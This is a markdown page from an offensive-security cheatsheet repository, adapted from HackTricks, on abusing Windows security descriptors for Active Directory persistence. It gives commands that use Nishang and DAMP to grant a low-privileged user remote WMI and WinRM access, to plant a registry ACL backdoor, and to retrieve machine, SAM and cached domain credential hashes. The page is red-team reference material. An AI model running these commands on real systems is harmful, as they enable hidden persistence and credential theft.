daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

security-descriptors.md (4081B)


      1 ---
      2 title: "Security Descriptors"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/security-descriptors.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/security-descriptors.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Security Descriptors
     14 
     15 ## Security Descriptors
     16 
     17 Windows security descriptors contain an owner SID, a primary-group SID, a discretionary ACL (DACL) that controls access, and a system ACL (SACL) used mainly for auditing. Security Descriptor Definition Language (SDDL) is the textual representation; an ACE string has the form `ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`.<sup>[[1]](#references)[[4]](#references)</sup>
     18 
     19 A security descriptor stores who owns a securable object and which principals are allowed or denied specific rights over it. If an attacker can change a DACL, they may grant a low-privileged principal rights that normally require an administrative role.
     20 
     21 This makes narrowly modified descriptors useful for persistence: the account remains outside obvious privileged groups while retaining access to a particular management surface. Preserve the original descriptor before testing so the change can be removed exactly.
     22 
     23 ### Access to WMI
     24 
     25 You can give a user access to **execute remotely WMI** [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)<sup>[[2]](#references)</sup>:
     26 
     27 ```bash
     28 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Namespace 'root\cimv2' -Verbose
     29 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Namespace 'root\cimv2' -Remove -Verbose # Remove
     30 ```
     31 
     32 ### Access to WinRM
     33 
     34 Grant a user access to a remote PowerShell/WinRM endpoint with Nishang's `Set-RemotePSRemoting` function:<sup>[[2]](#references)</sup>
     35 
     36 ```bash
     37 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
     38 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
     39 ```
     40 
     41 ### Remote access to hashes
     42 
     43 DAMP can create a registry-ACL backdoor that later permits remote retrieval of the machine-account hash, local SAM hashes, and cached domain credentials. Granting these narrow rights to an otherwise ordinary account—especially against a domain controller—provides powerful persistence without privileged-group membership.<sup>[[3]](#references)</sup>
     44 
     45 ```bash
     46 # allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
     47 Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
     48 
     49 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
     50 Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
     51 
     52 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
     53 Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
     54 
     55 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
     56 Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
     57 ```
     58 
     59 Check [**Silver Tickets**](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket) to learn how you could use the hash of the computer account of a Domain Controller.
     60 
     61 ## References
     62 
     63 - [1] [Security Descriptor Definition Language - Microsoft Learn](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language)
     64 - [2] [nishang - Set-RemoteWMI.ps1](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)
     65 - [3] [DAMP - Discretionary ACL Modification Project](https://github.com/HarmJ0y/DAMP)
     66 - [4] [Microsoft Learn — Security descriptor string format](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format)